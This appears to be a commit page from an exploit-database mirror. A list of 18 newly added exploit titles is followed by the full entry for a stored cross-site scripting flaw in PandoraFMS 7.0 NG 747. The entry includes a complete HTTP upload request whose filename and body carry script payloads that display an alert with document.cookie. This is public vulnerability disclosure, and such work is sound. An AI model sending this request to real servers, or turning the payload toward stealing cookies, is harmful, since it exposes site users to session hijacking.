9dd5a95a94
18 changes to exploits/shellcodes TapinRadio 2.13.7 - Denial of Service (PoC) RarmaRadio 2.72.5 - Denial of Service (PoC) Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution Eaton Intelligent Power Manager 1.6 - Directory Traversal PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities Employee Record Management System 1.1 - Login Bypass SQL Injection User Registration & Login and User Management System 2.1 - Cross Site Request Forgery Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting Savsoft Quiz 5 - 'Skype ID' Stored XSS vBulletin 5.6.3 - 'group' Cross Site Scripting
54 lines
No EOL
2 KiB
Text
54 lines
No EOL
2 KiB
Text
# Exploit Title: PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting
|
|
# Date: 2020-08-20
|
|
# Exploit Author: Emre ÖVÜNÇ
|
|
# Vendor Homepage: https://pandorafms.org/
|
|
# Software Link: https://pandorafms.org/features/free-download-monitoring-software/
|
|
# Version: 7.0NG747
|
|
# Tested on: Windows/Linux/ISO
|
|
|
|
# Link https://github.com/EmreOvunc/Pandora-FMS-7.0-NG-747-Stored-XSS
|
|
|
|
# Description
|
|
A stored cross-site scripting (XSS) in Pandora FMS 7.0 NG 747 can result in
|
|
an attacker performing malicious actions to users who open a maliciously
|
|
crafted link or third-party web page. (Workspace >> Issues >> List of
|
|
issues >> Add - Attachment)
|
|
|
|
# PoC
|
|
|
|
To exploit vulnerability, someone could use a POST request to
|
|
'/pandora_console/index.php' by manipulating 'filename' parameter in the
|
|
request body to impact users who open a maliciously crafted link or
|
|
third-party web page.
|
|
|
|
POST /pandora_console/index.php?sec=workspace&sec2=operation/incidents/incident_detail&id=3&upload_file=1
|
|
HTTP/1.1
|
|
Host: [HOST]
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0)
|
|
Gecko/20100101 Firefox/78.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------188134206132629608391758747427
|
|
Content-Length: 524
|
|
DNT: 1
|
|
Connection: close
|
|
Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
-----------------------------188134206132629608391758747427
|
|
Content-Disposition: form-data; name="userfile"; filename="\"><svg
|
|
onload=alert(document.cookie)>.png"
|
|
Content-Type: image/png
|
|
|
|
"><svg onload=alert(1)>
|
|
-----------------------------188134206132629608391758747427
|
|
Content-Disposition: form-data; name="file_description"
|
|
|
|
desc
|
|
-----------------------------188134206132629608391758747427
|
|
Content-Disposition: form-data; name="upload"
|
|
|
|
Upload
|
|
-----------------------------188134206132629608391758747427-- |